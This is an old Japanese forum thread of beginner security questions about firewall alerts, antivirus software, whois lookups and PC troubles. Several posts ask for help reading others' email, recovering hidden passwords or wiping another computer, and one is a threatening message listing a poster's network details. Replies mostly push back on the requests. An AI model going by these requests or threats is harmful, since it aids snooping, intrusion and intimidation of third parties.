富士通のFC3521RA1ていうADSLモデムに、 昨日までログインできていたのに突然ログイン出来なくなりました・・ 1月にパスワード変更して以来、何もパス関連は触ってないです・・・ どうにかログインできる方法ないですか?
>>746 なるほど踏み台ですか、ありがとうございます。
外部からパスワード変更されたのかな? と思って一応セキュリティに。 削除依頼だしてきますm(__)m
750 :
名無しさん@お腹いっぱい。 :02/03/24 01:47
yahooチャットで親友だと思っていた人にIP抜かれました(涙 その人のIP抜き返したいのですが、どうすればよいのでしょうか? ノートン インターネットセキュリティーでもわかるでしょうか?
>>751 マルチだから裏切られるんだよ。なんだよ「抜き返したい」って。w
歳いくつだよ?
↑怖くて開けない。何?
>>758 ちぇっかでした。いや、そうじゃなくて。ブラクラでないのは承知してますよ。
現実に立ち上がっていたんですから。なぜ、逝ったこともないサイトが勝手に
開かれるのかご教示願いたいのです。
>>759 どの板で書き込んでたら飛ばされたのか書かないと検証できない。
その後もその板に書き込んだら再現されるのか?
>>760 電力環境板だったと思ふ。再現はしない。よろすく。
762 :
名無しさん@お腹いっぱい。 :02/03/24 17:55
駆除とか隔離したウィルスはどっかに消えちゃうんでしょうか?
>>762 君の心の中に。。。(嘘
駆除したら(成功なら)、消失。
隔離したら、隔離フォルダに移動。移動先では拡張子を変えたり暗号化して再感染しないように保管。
764 :
名無しさん@お腹いっぱい。 :02/03/24 19:19
TR/PSW.Antigen.C このウイルス(トロイ?)の詳細を教えて下さい。
765 :
名無しさん@お腹いっぱい。 :02/03/24 19:24
あの〜、元ハッカーで現在サーバー管理者やシステム管理者なんて 人は結構いるのでしょうか? それともソフト畑へ行くのでしょうか?
>764 ウイルス博士がいると思ってんのか? ワクチンソフトメーカーのHPで調べろ
767 :
名無しさん@お腹いっぱい。 :02/03/24 23:19
2ちゃんに書き込みするようになってから、頻繁にネットセキュリティー が警告出すんですけど。。。。 何故でしょうか? 210.165.233.191←しつこい
768 :
名無しさん@お腹いっぱい。 :02/03/24 23:28
社内ネットワーク内で飛び交っているメールを 盗み見・・いや監視するツールって無いですかねー
769 :
名無しさん@お腹いっぱい。 :02/03/24 23:32
>>769 thanks!
ただ、ちょっと説明が足りなかったですね。
自分のじゃなくて、「不特定多数の方々のメールを」
という意味でござりやす。
771 :
名無しさん@お腹いっぱい。 :02/03/24 23:50
>>770 読めないことないだろーけど、それはまずいよ〜
捕まるよん、たしか
773 :
名無しさん@お腹いっぱい。 :02/03/24 23:56
>>770 串が理解できないっす。
教えてもらえますか?
巨人ファンの人にセキュりティの説明するの、嫌いです。 なぜなら、彼らは基本的にお人好しだからです。 ネット上に悪い奴がいるとは信じてくれないのです。 知り合いの巨人ファン2人がネットをしているのですが まるで無防備なんです。 先日、ゾヌ入れてあげたのに重いからとアンインストールしていました。 なんで巨人ファンは用心しないで生きていけるのでしょうか?
776 :
名無しさん@お腹いっぱい。 :02/03/25 03:29
ある日、突然ノートンの表示が出て攻撃されてるみたいなのですが また誰の仕業なのでしょうか??? 無料のエロサイトばっかり行ってるからでしょうか???
>>776 攻撃か?
何の警告を見て攻撃だと思ったんだ
ポートスキャンは攻撃では無いぞ
778 :
名無しさん@お腹いっぱい。 :02/03/25 03:51
警告、234 345・・・から攻撃されています みたいな事が昨日5回も表示されました。 何でしょぼユーザーの僕がハッキングされるのかさっぱりわかりません。 なんか韓国の人らしいです。
>>776 インバウンドのトロイ警告は単なるポートスキャンです
自宅の玄関をノックされただけなので怖がることはありません
怖いのはノートン先生が検知できないプログラムです
(怖くない例)
日付: 2002/02/19 時刻: 14:45:26
アドレス 24.48.245.** からの不正侵入の試みを
規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 によって検出しました。
以降のアクセスを 30 分間遮断しました。
そうそうこういうのです! 何だよかった・・・エロサイトの管理人が怒って攻撃してんの かと思った。レスありがとうです。
>>780 セキュリティホール無かったら大丈夫。
きちんとウィルスチェックとか、Winodws Updateしてる?
ウイルスチェックもUPDATEもしてますよ。 何かあったら怖いので(w
783 :
名無しさん@お腹いっぱい。 :02/03/25 09:33
エロサイトを見てると、よく下のようなメッセージが出るんですが、 これって「はい」を押しても大丈夫なの? MicrosoftかInternetExploereからの確認ならまだ良いんだけど、 表示されているサイト特有のものだったらやばいかなと思うんで。 セキュリティ警告 ■■■年齢チェック■■■ これより先アダルトの情報が含まれており ます。18歳未満の方は利用できませんので“いいえ”を押して退出して ください。18歳以上の方は“はい”を押してください。”は2002/03/20 に署名されて次から配布されております。インストールして実行します か? Netcash International Inc.
784 :
名無しさん@お腹いっぱい。 :02/03/25 09:48
>>783 どうして年齢チェックするのにインストールして実行しなければ
いけないのか、疑問に思わないか?「はい」を押したら「何をされても
いいですよ」ということだね。普通は国際電話に接続を切り替えられた
りするよね(w
ありがとう。 CATV環境でPCにはモデムはついてません。 一度「はい」を押してみたけど、なんとも無いよね? でも、こういうのがでてくると「はい」を押さないと 進めないので、ブラウザ終了させてるけど。
>なんとも無いよね? それはなんとも言えませんね。トロイ仕込まれてるかもしれないし。 「はい」押した以上「あなたにおまかせ、好きにして〜」状態だからね。 CATVなら国際電話の危険性がないだけであとの危険は他の接続と同じ。
むしろ、ADSLやCATVだから国際電話やQ2はやられないってことだけで 安心してしまうことが多くなっているような風潮が怖い。 最近はブラクラ、ジョークその他+トロイとかっていう 複合的な仕掛けが多いだけに。
788 :
◆.//////. :02/03/25 12:03
新しいパソコンを買ったんですけど、ネット環境を移行したいのですが、 ppp接続のパスワード等が「*****」となっているものを、 解析して実際のパスワードを表示する方法を教えてください。 そういったツールがあったと思い、アングラ系を探したのですが、 でてくるのは圧縮ファイルのクラックソフトばかりでした。 もし、上記のようなソフトをご存じでしたらソフト名だけでも教えてください よろしくおながいします。 OS Windows2000 + SP2
最近マカフィーがお亡くなりになってしまったので ソフトを買い換えようと思うのですが バスターと先生どちらがおすすめですか? ソフト購入初めてなんで使いやすい方がいいです 宜しくお願いします
>>789 Norton
というか、フリーので良いよ。
792 :
◆.//////. :02/03/25 12:08
>>790 ありませんでした…
探し方が悪いんですかね??
794 :
◆.//////. :02/03/25 12:16
>>793 いやいや、探しました。
「Windows2000」の「ppp接続のパスワード」
のはないんですよ。
Win9x系、もしくはWin2kだけどPPPの設定以外 っていうのはあるんですけどね…
う〜む。やっぱり無理っぽいですね。
すみません、あきらめてプロバイダに問い合わせします。
>>793 いろいろ予想で書いてくださってありがとうです。
798 :
名無しさん@お腹いっぱい。 :02/03/25 13:37
さっきZone Alarmが反応していたので調べてみると、MITからの侵入でした。
MITといえば、共和党と関係が深いといわれ、CIAやNSAの仕事をいていると言われています。
私はそんな機関に興味をもたれているのでしょうか。
The firewall has blocked Internet access to your computer (TCP Port 111) from 218.50.3.26 (TCP Port 4111) [TCP Flags: S].
Time: 2002/03/25 13:19:48
Rights restricted by copyright. See
http://www.apnic.net/db/dbcopyright.html % (whois6.apnic.net)
Massachusetts Institute of Technology (NET-MIT-TEMP)
1 Amherst Street
Cambridge, MA 02139-1986
US
Netname: MIT
Netblock: 18.0.0.0 - 18.255.255.255
Coordinator:
Schiller, Jeffrey (JIS-ARIN)
[email protected] +1-617-253-8400 (FAX) +1 617 258-8736
Domain System inverse mapping provided by:
STRAWB.MIT.EDU 18.72.0.151
W20NS.MIT.EDU 18.70.0.160
BITSY.MIT.EDU 18.72.0.3
Record last updated on 26-Sep-1998.
Database last updated on 24-Mar-2002 19:56:58 EDT.
The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.
218.50.0.0はチョンだろ。 わけもわからずwhoisすんな。
800 :
名無しさん@お腹いっぱい。 :02/03/25 13:49
プ
Whoisコピペする意味がどこにあるんだよ。この陰謀マニア。
X-Files症候群だな。それか「自分は選ばれた者でアール」症候群。
804 :
名無しさん@お腹いっぱい。 :02/03/25 17:56
っていうか、まじでMITやCIAならそこからやらんでしょうし、 送信元くらい偽装するでしょう。
単なるロボットっておちはないの?
>>798 そりゃ〜、218.xxx.xxx.xxxと、18.xxx.xxx.xxxは違うわなぁ…
アドレスクラスももちろん違うし、とにかくもの凄ぉ〜い大違いだわなぁ…
だからといって叩くつもりもないんだが。
PGPのPGPdiskだけ単体で使えたらなと思って似たようなの探したら、 scramdiskっていうのを見つけたんですけど、これWin2kじゃ使えないんですよね。 似たような機能のフリーソフトでWin2kで使えるものってないでしょうか。 できれば、インストール作業をしなくても使えるものがいいです。 USBメモリーキーに実行ファイルと暗号化したデータファイル(データドライブ)を 入れておいて、どのパソコンでもデータが見れるようにしたいんです。
しまった、ここって“ネットワーク”セキュリティの板だったんですね。 板ちがいですいません。 他の板あたってみます。 (どの辺がいいんだろう...)
811 :
名無しさん@お腹いっぱい。 :02/03/26 00:36
くだらない質問で申し訳ないのですが。 今、何時ですか?
朝の8ジデス
「セキュリティー」と「盛りたい」って似てますよね?
814 :
初出場厨房 :02/03/26 00:55
Exploit-CodeBase ってどんなウイルスですか? 駆除方法をご教示願います・・・。
815 :
おばか@かばお :02/03/26 02:01
817 :
まるせりーに :02/03/26 05:56
はじめまして。 ウィルス関係とおもわれるトラブルが発生したため質問させていただきます。 長文になりますが目を通していただけませんでしょうか。 私の友人でWinMXばかり使っている奴がいるのですが、 ダウンロード先に指定しているHDにアクセスできなくなる、文字化けしてアクセス不可になる などの症状がでており、彼曰く、「ウィルスにやられた」だそうです。 しかし、私はウィルスかどうか判断しかねています。 なぜかというと、彼のPCにはウィルス対策ソフトとしてNorton インターネットセキュリティ 2002が インストール、フルスキャン(監視)されており、一度もウィルスが見つかっていない。 また、DLしたファイルを移動、または右クリックしたら(スキャンのため)感染、 HDが容量0に、あるいは文字化けしたといっており、ファイルまたはプログラムを実行したのではないため。 以上の理由から判断に困っています。当然、ウィルスにも様々な種類がいるのでしょうが、 原因がウィルスだとしたら、送る相手も感染してしまいますよね。ちなみに彼のOSはWIN98無印なのですが、 Win9X限定ウィルス?あるいは相手はWindows以外のOS? 以下に彼の環境をわかる範囲で記載いたします。 ------------------------------------------ PC:古いコンパック(CPU K6 確か300MHzくらい) RAM:394MB OS:Windows98無印 HD:一台目(Cドライブ:コンパックについてた古いヤツ) HD:二代目(Dドライブ:リムーバブルケースにいれて使用、IBMの最近のヤツ。ATA100。) LAN:Corega PCI-TXS フレッツADSL 1.5M (ADSLモデム直つなぎ) Norton インターネットセキュリティ 2002 ------------------------------------------ こんな感じです。HDのリムーバブルケースはHDをはずしてもPC側にDドライブが認識されております。 デバイスマネージャでリムーバブルにチェックはいれておりません。接続形態不明。 ちなみにHDは一回目のウィルスの後、新しいHDに交換しており、それでも同じようなトラブルがおこっております。 私はリムーバブルケースを少し怪しいと思っているのですが、以前ATA66がではじめたころ、 ATA33では動作に不具合がでるものがあったと記憶しております。 いろいろ調べているのですが、なかなかこれという手がかりにありつけない状況です。 助言いただけるととてもありがたいです。 長文になりましたが、どうかよろしくおねがいします。
>>817 >また、DLしたファイルを移動、または右クリックしたら
>(スキャンのため)感染、 HDが容量0に、あるいは
>文字化けしたといっており、ファイルまたはプログラムを
>実行したのではないため。
日本語ダイジョウブデスカ?
それはウイルスじゃないでしょ。
とりあえずリムーバルケースを外して直接ATAケーブルに
繋げて試してみればいいのでは?
821 :
まるせりーに :02/03/26 13:34
>>818-820 レスありがとうございます。
日本語へんですいません。
目的は原因を明確にするためだったのですが、
うまく説明になってませんね。
被害にあったと言っている本人は根拠もなく
「WinMX使うとウィルスはいる」と周囲に言ってまわっているのですが、
それを否定できるだけの説明ができない現状です。
また、リムーバブルケースをはずせとは、何度も言っているのですが、
PCを空けるのが相当いやなことらしく、必ず拒否されます。
やれることを全てやってから意見をうかがうべきなのですが、
私のPCじゃないので無理に空けるわけにもいきません。
そこは嫌がるくせに、ウィルス入ったといってすごいへこんでるんです。
同様の症状の方がいらっしゃったらアドバイスをいただけるかと思い、
質問しました。
再び質問させていただきます。
@ファイルをクリック(移動、右クリックメニュー表示のため)することで感染し、
症状としてファイルの存在するハードディスクを消去、なんらかのトラブルを発生させるウィルスは存在しますか?
A上記のようなハードディスクのトラブルが、リムーバブルケースによる接続、またはATA33にATA100のハードディスクを
接続するといったような状況で発生することがありますか?
再び長文、駄文になったことをお詫びしつつ、
どなたか助言いただけるとありがたいです。
どうかよろしくお願いします。
NIS2001のメール保護についてですが 最近まで普通に使えていたのですが 突然送信ができなくなってしまいました。 エラーメッセージは出ませんが自分に出すと返って来ません。 プロバイダかと思いサポートに電話したところ 保護設定を解除してみろと言われ解除したら ちゃんと使えるようになりました。 シマンテックに電話したらユーザー登録してないと サポートでけんばいとか言って全くお話になりません。 似たような症状の人居ませんか?
823 :
名無しさん@お腹いっぱい。 :02/03/26 14:48
ADSL環境下で使えるフリーのFTPありませんか? 今使ってるのだとファイヤーウォールどーのこーので繋げないんですけど…
825 :
名無しさん@お腹いっぱい。 :02/03/26 15:29
>>821 まさにスレタイトルにふさわしい質問ではある。
他人のパソのことなら、そいつにまかせりゃイイだろ。
解明したけりゃ、自分で調べろ。 しらねぇーYO!
826 :
名無しさん@お腹いっぱい。 :02/03/26 16:55
質問させて下さい。 ofsfi-##.odn.ad.jp < このリモートホストって東京のどのあたりのアクセスポイントかご存知ないですか? BBSが攻撃されてるわけじゃないんですが、ただただリロードを繰り返されてて不気味なんです。 よろしくお願いします。
827 :
名無しさん@お腹いっぱい。 :02/03/26 17:02
>ただただリロードを繰り返されてて不気味なんです。 いいじゃねえか、変な書き込みされるよりも。 公開されてるBBSなんだろ。読んでもらってありがたいと思わなきゃ。
828 :
名無しさん@お腹いっぱい。 :02/03/26 17:23
>>827 それはそうなんですが、サーバーの負荷が大きくなると、目つけられて下手すっとCGI使えなくなっちゃうんです。
お願いですから教えて下さい。
829 :
名無しさん@お腹いっぱい。 :02/03/26 17:29
830 :
名無しさん@お腹いっぱい。 :02/03/26 18:02
>>823 パッシヴ(passive)モードでも?
831 :
名無しさん@お腹いっぱい。 :02/03/26 19:51
LANで繋がってるwinからmacを攻撃する方法ってないですか? PCを落としたり、ハードディスクを初期化したり、重要なファイルを消したりしたいのです。 どなたか教えてください。 教えて君で済みません。
832 :
名無しさん@お腹いっぱい。 :02/03/26 19:56
すいません、2ちゃんのスレ立てやレス付けをしても 絶対に誰にも個人情報取られたりしないのですか?
IE立ち上げた時に、どこにも接続してないのに、なにか通信してるんだけど。 ZoneAlarmも反応しないし、ウイルスチェックにもひっかからない。
>828 ODNにそのログを提出して、警告なりアカウント削除なりを してもらったほうがいいと思う。 後は、アクセス制限をするとか。 >831 初級ネット板へ逝け。 >832 IPアドレスは取られるけど、犯罪を起こさなければ問題なし。 >833 UDP:1024ポートあたり?
>>821 Aだ。
なんでATA100のHDDにわざわざATA33のケーブル使ってんだ?
そのりリムーバルケースはATA100対応なのか?
最新定義のウイルスソフトで検知されないのなら
とりあえず別を疑うのが常識。
>>835 、他のみなさま
助言ありがとうございます。
まったくもっておっしゃるとおりです。
アドバイスしてくださったことについて、
確認してみようとおもいます。
アドバイスくださったみなさま、
本当にありがとうございました。
もっと勉強して、いつかはアドバイスする側の人間になれるよう
努力したいと思います。日本語についても。
今回は勉強させていただきました。
ありがとうございました。
838 :
名無しさん@お腹いっぱい。 :02/03/27 00:21
あれれ、久しぶりにMcAfeeスレ見に来たら dat落ちしてんじゃん。 新スレがいくら探しても見つからないんだけど どうなってしまったの? まさか結論がでたとか(藁、 ソースネクストからスレ削除依頼来たとか。
839 :
名無しさん@お腹いっぱい。 :02/03/27 02:05
>>838 みんな面倒だからと
次スレ立てなかっただけ
誰かがPart3スレ立てれば復活するけど
841 :
名無しさん@お腹いっぱい。 :02/03/27 02:30
「こんにちは、ユカで〜す!」というメールが少し前から来るんだけど みんなには来てます?本文が怪しいE-mailアドレスばかりの意味不明な ヤツなんだけど…
ポート135って何?どうやって止める?
つい先頃から、マウスポインタが強制的に移動してしまう現象に おちいって、ほとほと困っております。 よろしければ、対処・情報等、教えていただければ幸いです。な お、この板に書き込んだ理由は、ウィルスでは無いかと考えた次第 からです。 お手数ですが、なにとぞよろしくお願いします。 『症状』 ・マウスポインタの強制移動 デスクトップ上、及び各種ソフト使用時でも発生。 (※ウィンドウ、排他画面ソフト含む) ・強制移動位置 図)ディスプレイ | | | ――――――――――― |●ココラヘン | | 『試した対処』 ・ケーブルさし直し(電源OFF・電源ON双方) ・ドライバ削除・インストールし直し ・ノートンによるクリーン処理、ウィルススキャン ・全常駐OFF ・やばそうなデータならびにソフトの削除(無かったと思います) 以上です。 ただ、気になったのは --------------------------------------- VBS.DWorld.AはVBスクリプトワームの一種で、 自分自身を添付した電子メールをユーザのアド レス帳に登録されているメールアドレスすべて に送りつけます。また、mIRCを介しても感染を 広げます。 毎月1日と27日になると、メッセージを表示し、 マウスとキーボードを使用不能にする発病症状 を持っています。 --------------------------------------- です。日付が日付なだけに・・・でも、検索されないし(汗 なにとぞ、なにとぞ、ご教授の程を。
すみません、書き忘れ・・・。 OS Windows2000p 対処補足 電源OFF(5分間) 以上です。
845 :
名無しさん@お腹いっぱい。 :02/03/27 08:29
>>843-844 USB(いろいろと相性とか競合多し)かPS2か、
ノートタイプ(タッチパッド等との併用可能か排他か)か、
などの情報がないんで、他の問題の可能性を除去できないよ。
それに、ケーブル差し直しはUSBでなかったらやばいし。
マウスならまだしも、キーボードだといっちまうこともあるよ。
あと、マウスのメーカーのサイトなどみて、OSとの対応や、
ドライバの更新の有無とかは確かめた?
あ、ケーブルの差し直しでやばいのは電源ON時ね。
849 :
名無しさん@お腹いっぱい。 :02/03/27 11:11
おまえら、気がついたらIEのwindow titleが「小林カツ代エクスプローラ」に変えられてたんですが そんなトロイってあるんですか?
850 :
名無しさん@お腹いっぱい。 :02/03/27 12:22
Windows板に質問させて頂いたのですが、こちらの板の方が住人のスキルが高いと 言われ、引っ越してきました。 2000サーバーが勝手にルーターを使ってダイヤルアップします。 サーバーの電源を切っているとルーターにダイヤルアップのログが無いので 明らかにサーバーの仕業だと思うのですが、原因は何でしょうか。 ちなみにサーバー機にインストールしたソフトはOSだけです。 今までに確認した事項(過去ログ、FAQより) ・DNS への動的登録を禁止 「マイネットワーク」を右クリックし、[プロパティ] をクリック。 「ローカルエリア接続」を右クリックし、[プロパティ] をクリック。 [インターネットプロトコル(TCP/IP)] をダブルクリック。 「詳細設定」ボタンをクリック。 [DNS] タブをクリックし、「この接続のアドレスをDNSに登録する」のチェックを解除。 「OK」をクリックして設定を保存。 ・Active Directory の LDAP 参照や、コンピュータブラウザのドメイン名<1b> への接続要求を確認 「マイコンピュータ」を右クリックし、[プロパティ] をクリック。 [ネットワークID] タブをクリックし、「プロパティ」ボタンをクリック。 「詳細」ボタンをクリックし、「このコンピュータのプライマリ DNS サフィック ス」に何も記入されていないことを確認。 「マイネットワーク」を右クリックし、[プロパティ] をクリック。 「ローカルエリア接続」を右クリックし、[プロパティ] をクリック。 [インターネットプロトコル(TCP/IP)] をダブルクリック。 「詳細設定」ボタンをクリック。 [DNS] タブをクリックし、「この接続の DNS サフィックス」に何も記入されていな いことを確認。 ・IEの自動更新の確認 IEのツール → インターネットオプション → 詳細設定 → Internet Explorer の 更新について自動的に確認する にチェックしてないかどうか。 ・メディアプレイヤーの自動更新の確認。 [スタート]−[ファイル名を指定して実行] から regedit を起動。 HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \MediaPlayer を展開。 [編集]−[新規]−[文字列] から EnableAutoUpgrade 値を作成。 EnableAutoUpgrade 値をダブルクリックし、データに No を設定して「OK」をクリック。 ・ウィルスの感染は無し 上記全て確認しましたが、ダメです。かってにダイヤルアップします。 何故でしょうか。 チェックすべき項目があれば、ぜひとも教えてください。
>>850 2000サーバよりルータの設定を見直した方がいいんじゃないか?
何かしらのパケットが飛んできてダイアルしているんだろうから
そのパケットでダイアルしないようにすればいいでしょ?
>>851 レスありがとうございます。
今からルーターの設定とか調べてみます。
>>850 ルータのログにトリガーが残ってないのか?
854 :
名無しさん@お腹いっぱい。 :02/03/27 13:28
ノートン先生(更新した状態)でも感知できないウイルスがあるって 聞いたんですけどマブですか?
>>845 ったりまえだろ。存在しないウィルスの定義データどうやって作るんだよ。
>>853 レスありがとうございます。
ダイヤルアップのトリガーになっているパケットを無視する設定にすればいいんですよね。
今ちょっと確認できない状況なので、後でルーターを確認してみます。
今回 1 回だけユーザーが選択したのは 「遮断」 通信。 詳細: インバウンド UDP パケット ローカルアドレス、 サービスは xx.xxx.xx.xx,isakmp(500) リモートアドレス、 サービスは 66.31.47.231,62114 プロセス名は C:\WINNT\system32\lsass.exe Lsass.exeに接続要求来たんですけど、もしかしてトロイに感染してます? (((( ;゚Д゚)))ガクガクブルブル
>>846 さん
ありがとう御座います。
説明不足があり申し訳ありません。
マウスは二種類使用していまして、PS2+USBの双方を使用してい
ます。これらは以前、正常に動作していたもので、昨日突然、前述
した症状が発生しました。ドライバの更新の有無も確認しました。
LiveUPdateで随時最新版に更新してからスキャンしています。
VBSDWorld.Aに関しては、同じようにマウスにちょっかいを出す新
型でも出たのかなぁと。
依然として、直っていません。(汗
>>858 PS2でもUSBでもこの症状が起きるってことでいいの?
それとこのPCはノートなの?
例えばノートに付いてるマウスが故障してるってことがあるからね。
通報しますた。
−−−−−
H大好きな女子と友達になりたい。名前:あゆかちゃん
[2002/03/27,13:15:02] No.8024
H大好きな女子と友達になりたい。
返事頂戴。
メールでお願いします。
−−−−−
設置場所の電話番号を押さえました。
懲罰を受けたくなかったら謝罪文を
[email protected] に送り、
掲示板に謝罪文を書き込め。
[email protected] 218.225.143.
a.[IPネットワークアドレス]218.225.128.0-218.225.159.0
b.[ネットワーク名]XEPHION
f.[組織名]XePhion(株式会社エヌ・ティ・ティ エムイー)
g.[Organization]XePhion(NTT-ME Corporation)
[email protected]
>>858 マウスポインタがあちこち動き回るって意味なんだろうか。
悪質なJOKEソフトにそんなのが幾つかあったな。
>>859 どうもご丁寧に。
USB・PS2のマウス双方に同じ現象が出ます。PCは自作のデスクトップ
です。
>>861 あちこちではなく、ある一定の二箇所に自動的に戻ってしまいます。
マウス関連やハード的な問題じゃないようなので、今、ビデオボード
のドライバを書き換えてます。一定の場所・どういったソフトでも発
生って所がビデオボード関連ぽいので。
デュアルディスプレイ対応のビデオボードだから・・・かもしれません。
>>863 初めて聞く症例ですね。
お力になれずスマンっす。
自作機ならではの問題なんでしょうね。
修復成功したら、ぜひとも報告して下さい。
先日検出が難しいvilliの詰め合わせをワクチンベンダー各社に送信した。 そしたら変なメルが届いた。 >>システム管理者に連絡してください。 >>スキャンした文書中の感染したすべてのコンポーネントを修復または削除しました。 >>ウィルス情報: >>コンポーネント 漏れが送ったファイル [Win32.Pilsen.4096 within villi-store/Win32.Pilsen.zip] >>はウィルス W95.Companion.4096.D が入っていて削除されました。 以下それ系の文章がひたすら続く。 何だコリャ。誰が送ったファイルを自動的にチェックしてくれなんて頼んだんだ。
せっかくインフルエンザ休業中なのに、人がいなくてさみしい。
去年のうちに4500円×2で打ったワクチンが効いたのか、今冬は風邪しらずだ。
868 :
名無しさん@お腹いっぱい。 :02/03/27 23:50
>>862 ノートン先生でチェックしてみたんですけど、ウィルス出てきませんでした。
とりあえず安心かな。
(・∀・)ライーヨー!
869 :
名無しさん@お腹いっぱい。 :02/03/28 03:03
2ちゃんでDLしたzipファイルに困ってます 「きゃ〜!!」という叫び声と共に 田中麗奈の顔がでてきます どうすれば出ないようになるのかわかりません。 具体的な削除方法などアドバイスよろしくお願いしますm(__)m
870 :
名無しさん@お腹いっぱい。 :02/03/28 03:13
871 :
名無しさん@お腹いっぱい。 :02/03/28 03:15
872 :
名無しさん@お腹いっぱい。 :02/03/28 03:22
873 :
ご教授の程を@844 :02/03/28 04:48
>>846 さん、
>>859 さん、cheshire-catさん、どうもありがとう
御座いました。
ビデオボードのドライバを変えたら、治ってしまいました。
多分、マウスポインタの移動場所から考えて、表示されている画
面(1280*1024)の大きさと、定期的にボードが検知する画面サ
イズが異なっていたため、ボードが検知したとされる1152*864
(1024*768)の左下隅の場所に移動していたのではないかと思い
ます。
結果として完全に板違い、お騒がせしてすみませんでした。
でも、2chでこんなに親切に対応してくれたの初めてなので、なん
だか得した気分です。
本当にありがとうございました。
874 :
名無しさん@お腹いっぱい。 :02/03/28 05:50
>>873 ビデオボードか、なるほど。参考になりました。
>>873 ああ、表示の方だったのか。そゆこともあるものなんだ。
とりあえず、解決されて何より。
2ちゃんも、板次第、スレ次第、運次第な面があるからなあ。
877 :
名無しさん@お腹いっぱい。 :02/03/28 08:56
>>868 最新パターンのノートンでも検知しない時があるから、トレンドのサイトで
オンラインチェックとWでやっとくと良いよ。
今までに数回発見できたことがある。
878 :
名無しさん@お腹いっぱい。 :02/03/28 09:05
先週あたりからExchangeを狙い撃ちにした、Virus付 きメールを大量に送ってくるアタックが続いてない? 「なんか調子悪い」と色んなところから声がかかる。 イベントログ見ると、同じようなパターンで侵入試行の失敗が残っ てて、その何日か後からExchangeが不安定になるんだけどね。 古〜いPostOffice使ってるところは何ともないが.. ただのRelay狙いとも違うようで、気色悪い。
880 :
名無しさん@お腹いっぱい。 :02/03/30 05:07
881 :
名無しさん@お腹いっぱい。 :02/03/30 06:31
あの〜、ノートン入れてからメールの添付(画像なんか)が全部削除されて しまうのはどうしたらいいのやら。。。。
882 :
名無しさん@お腹いっぱい。 :02/03/30 09:11
さっき、トロイの木馬?(高危険度)に攻撃を受けて AOUTOBLOCKで遮断しているコンピュータのアドレスが出てきたのですが何かやることはあるのですか?ほっといてもいいのですか
IPAに連絡しないと
884 :
質問の答えが聞きたいなら漏れに聞くな! ◆02DstxeI :02/03/30 09:46
>882 ありがとうございます
885 :
名無しさん@お腹いっぱい。 :02/03/30 09:49
110番ポート隠す方法あったら教えてクレー! よろしくたのます。ちなみにルータ無しで・・・
886 :
名無しさん@お腹いっぱい。 :02/03/30 10:10
Norton SystemWorksを2001から2002にアップしたら、 AntiVirusのNetscapeプラグインのサポートが、なくなっていました。 AntiVirus2002で、これを有効にする方法はありますか?
887 :
名無しさん@お腹いっぱい。 :02/03/30 13:13
パソコンを窓から投げ捨ててるモナーのAA知りませんか。 以前この板で見たような記憶があるのですが。
888 :
名無しさん@お腹いっぱい。 :02/03/30 13:38
Win2000でwindows updateしようとするとredirと言うファイルが ダウンロードされようとするんだけど、これってダウンロードしちゃって良いの?
889 :
名無しさん@お腹いっぱい。 :02/03/30 13:49
>886 プラグインのサポートがなくなっても、 Auto-Protectが働いてれば問題ないじゃん。 2度手間な無駄な機能がなくなっただけだとおもわれ。
891 :
名無しさん@お腹いっぱい。 :02/03/30 16:38
892 :
名無しさん@お腹いっぱい。 :02/03/30 17:08
フリーのfirewallってありませんか?
894 :
名無しさん@お腹いっぱい。 :02/03/31 18:53
>894 画面ボケてて読む気氏ねえよ! プリントスクリーン知ってる?
>>894 comet corsorか。
どこでそんな怪しいの拾ってきたんだか。
googleで探してみ。被害者たくさんいるから、駆除方法はすぐ見つかるかと。
>>895 何そんなに頭に血上らせているんだ?
まあまあ。
niftyのwinfaqに確か載ってたけど、url捨てたんでわからん。
898 :
名無しさん@お腹いっぱい。 :02/03/31 19:15
netstat -a で見てみたら、ポート44334が開きっぱなしなんですけど これって何でしょ?ご存知の方情報お願いします。
>>898 はっきり言います、調べようが無いっす。
と言うのも、どっかのトロイのデフォルトポートって回答は容易だが。
しかーし!
わざわざ仕込むのに、デフォルトポート使うわけもなく。
プロセス名調べて潰したらどうだろうか。
ちゅうかサービスとかスタートアップにゴミが入ってるかと。
900 :
名無しさん@お腹いっぱい。 :02/03/31 19:40
>>899 Tinyを手動起動にしたら閉じました。
こういう仕様なのですね。
回答ありがとうございました。
>>900 Tinyだったのか???????
漏れ的にはとっても興味ある。
明日職場でやってみよ(らぶ
え、もしや(゚д゚)マズー? 明日のご回答をお待ちしております・・・
>>902 冷静になって考えてみた。
Tiny入れているパソって、しばらくメンテサボってるんだが。
自動アプデートとかそういう奴なんだろうか?
なぜスタートアップから外したら解決するんだろうか。
Ad-Aware使ったほうが近道のような気がする。
904 :
あいうえお :02/03/31 20:33
至急無料のワクチンソフトの アドレスください!! 日本語がいいです!!おねがいします!! ひとだすけだとおもって!!
>>904 体験版 シマンテック ノートン
明日は製品版を買いに行け
907 :
名無しさん@お腹いっぱい。 :02/04/01 00:16
IPから相手を突き止めるって事 できるんですか?ホントに初心者です。 こんな質問でごめんなさい。
908 :
名無しさん@お腹いっぱい。 :02/04/01 00:19
どのプロバイダとかどの会社からのアクセスかはわかるかと
909 :
名無しさん@お腹いっぱい。 :02/04/01 00:26
>908 相手の個人情報までは分からないんですね? あとご存知でしたら・・・ 串ってなんですか? 串さすと言うのは・・・??
911 :
名無しさん@お腹いっぱい。 :02/04/01 09:26
>>910 proxy???それってなんですか?
無知ですんません(泣)
>>911 本当に無知ですね。自分で調べる方法も知らないんですか?
いつの間にかダイヤルアップに接続先が増えてて 気付いてすぐ消したけど 届いた請求書の金額がなんと17万円/2日!! 明日が支払い期限なんだけど どーすればいいでしょう?
BLACKICEをいれたところUDの送受信ができなくなりました。これはどう対応したらいいのでしょうか?
914は討ち死か。。。。 一応Q2だったらNTTにゴネて文句つけて、弁護士立てて騒ぐと、払わなくても済む事があるって、書いておく。
918 :
名無しさん@お腹いっぱい。 :02/04/01 23:27
疲れた・・・。 トレンドマイクロのオンラインスキャンがどーしてもできません。 現在の設定では ActiveX が動きません ていうエラーが出ます。インターネットオプションで低にしても ダメです。考えられる原因にはどういうものがあるでしょうか。
皆様〜教えてほしいんだけど…!! 「心地よい通信」ってどういう通信のことを言うのかな?って思って… よかったらいろいろ教えてほしい。どういう通信だったら「心地よい」って感じる?
923 :
名無しさん@お腹いっぱい :02/04/02 00:08
